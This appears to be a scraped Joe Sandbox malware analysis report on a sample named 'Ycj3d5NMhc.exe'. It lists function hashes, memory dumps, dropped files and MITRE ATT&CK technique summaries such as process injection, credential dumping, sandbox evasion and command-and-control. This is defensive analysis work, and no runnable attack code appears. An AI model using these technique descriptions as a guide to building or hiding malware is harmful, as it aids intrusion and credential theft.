Instruction ID: 0d7fdbc3f4831713dc50675b9786b204e9a40dd9c8543e156e9b35be53dcf4bb
Opcode Fuzzy Hash: 52c92d18d46fc6d3019be620dbb9e8e77a3be0ed1a4d79c60dca407b944c5813
Instruction Fuzzy Hash: FB620FB06103009BE748EF58D49872A7AE6EB84308F64C55DD00D9F3D6DFB6D90B8BA5

Function 059DA640 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2952fee37086bc4143258dab3e3555b4f09300fe465f11084e1d7cc46044a85f
Instruction ID: c3fed2c58acd7d4e49050cb0e82c1f42da208aed434bb236f56e1754efc1ce49
Opcode Fuzzy Hash: 2952fee37086bc4143258dab3e3555b4f09300fe465f11084e1d7cc46044a85f
Instruction Fuzzy Hash: CC329174E05229CFDB64DF65D984B9DBBB2BB89301F1091EAD409A7361DB309E81CF60

Function 00EBE070 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a606ab6848adc81ea36f8fe1b5eebe2801a88ab7eeff09fc0da69940cb9be99f
Instruction ID: 125a85224688fb20481ea5ff1dc3e633e5db284bcccee4625593bc384390910d
Opcode Fuzzy Hash: a606ab6848adc81ea36f8fe1b5eebe2801a88ab7eeff09fc0da69940cb9be99f
Instruction Fuzzy Hash: FDD17D74E05218CFDB54DFA9C984ADEBBF2BF89304F2091A9D409AB355DB30A981CF50

Function 059DC19F Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb7a735b48f235cd9c5677f3aa59fcff3dcfc7bd5db7ac2d10f7580c53c41ce
Instruction ID: 871399738592410b5578a571c847655c326cd78c20ba5ec0d9e05049dc6e16a5
Opcode Fuzzy Hash: fdb7a735b48f235cd9c5677f3aa59fcff3dcfc7bd5db7ac2d10f7580c53c41ce
Instruction Fuzzy Hash: E8C1BF74E05218CFDB24DFA9C984BAEFBB2BF89300F209169D409AB255DB349985CF50

Function 059DD378 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7b3c94b8474db23429e3d42f37f60c9d055c318e85f8a04d264a24000f1d28
Instruction ID: f7c76d06af3e6da0f6377dd65cade663f16ca9b23b9460d70f860ea888886846
Opcode Fuzzy Hash: 8e7b3c94b8474db23429e3d42f37f60c9d055c318e85f8a04d264a24000f1d28
Instruction Fuzzy Hash: 8271B174D05318CFDB04DFA6D4446EDBBB6FF89301F248429E815AB294DB356A46CF50

Function 00EBE061 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c4cdfa29371cf8d6d31bc6c874561b18d121e9760fe4953adf5b08e71fe7b2
Instruction ID: 6915b66c87abbc75d79f620d0cb6298bdfa2c744113b3d78c54b9f1a97cb4b88
Opcode Fuzzy Hash: 34c4cdfa29371cf8d6d31bc6c874561b18d121e9760fe4953adf5b08e71fe7b2
Instruction Fuzzy Hash: D941B6B5E056088FDB18DFAAD9446DEBBF2AFC8300F14C16AD418AB365EB345946CF50

Function 059D06E0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0961cac345cad17936de991add6792c1e87f25f6a660226944a1e95df799c57c
Instruction ID: 160136e6412a809803118a49bb83b4c57b18b90ad6702140ae56d6f37ed0f193
Opcode Fuzzy Hash: 0961cac345cad17936de991add6792c1e87f25f6a660226944a1e95df799c57c
Instruction Fuzzy Hash: 4731C8B1E00609DBEB18CFAAD9487DEFBF6BF88310F18D029D408AB255D7745946CB50

Function 059DD589 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286d7a048aca96230c73a68341b92f0a28f8bbaadb3bd4fb98746bdd706c3a31
Instruction ID: 8b1368fc46f6b7bf8e4f56432836c20083008c269592f94dc50413d597b51194
Opcode Fuzzy Hash: 286d7a048aca96230c73a68341b92f0a28f8bbaadb3bd4fb98746bdd706c3a31
Instruction Fuzzy Hash: 8631A6B1D006588BEB18DFAAD8543DEFBF6AF88304F14C02AC419AB259DB750546CF90

Function 059DAD6A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d84e75eca6516ae75d44b4fe68a4e630f035181522d6a3a6cbf48a7425e96c2d
Instruction ID: 45212c09eedcd6b846a623b37c35751e9a3c593208348d6b703700aecbcb4542
Opcode Fuzzy Hash: d84e75eca6516ae75d44b4fe68a4e630f035181522d6a3a6cbf48a7425e96c2d
Instruction Fuzzy Hash: A131C334A05228CFDB24DF60D948BADBBB2BB85301F2085D9D54A772A1DB314E85CF61

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ycj3d5NMhc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ycj3d5NMhc.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Victim_SID[1].bd

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Zopi[1].bd

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\mzsxeov1.jvf\[user]-[468325].zip

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Ycj3d5NMhc.exe

Function 00007FFB4B05164D Relevance: 1.7, APIs: 1, Instructions: 210
filenetworkCOMMON

Function 00007FFB4B0511B9 Relevance: 1.8, APIs: 1, Instructions: 258
networkCOMMON

Function 00007FFB4B05140D Relevance: 1.7, APIs: 1, Instructions: 247
networkCOMMON

Function 00007FFB4B056151 Relevance: 1.7, APIs: 1, Instructions: 220
injectionCOMMON

Function 00007FFB4B05635D Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Function 00007FFB4B055FA8 Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Function 00007FFB4B055CBE Relevance: 1.7, APIs: 1, Instructions: 169
threadCOMMON

Function 00007FFB4B055E49 Relevance: 1.6, APIs: 1, Instructions: 140
threadCOMMON

Function 059D5E20 Relevance: 4.4, Strings: 3, Instructions: 694
COMMON

Function 00EBD3B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
nativeCOMMON

Function 00EBD3C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
nativeCOMMON

Function 059D8A8F Relevance: 3.3, APIs: 2, Instructions: 293
libraryCOMMON

Function 059D9B28 Relevance: 1.9, APIs: 1, Instructions: 367
libraryCOMMON

Function 059D06F0 Relevance: 1.7, APIs: 1, Instructions: 173
libraryCOMMON

Function 0599EAE8 Relevance: 1.7, Strings: 1, Instructions: 422
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre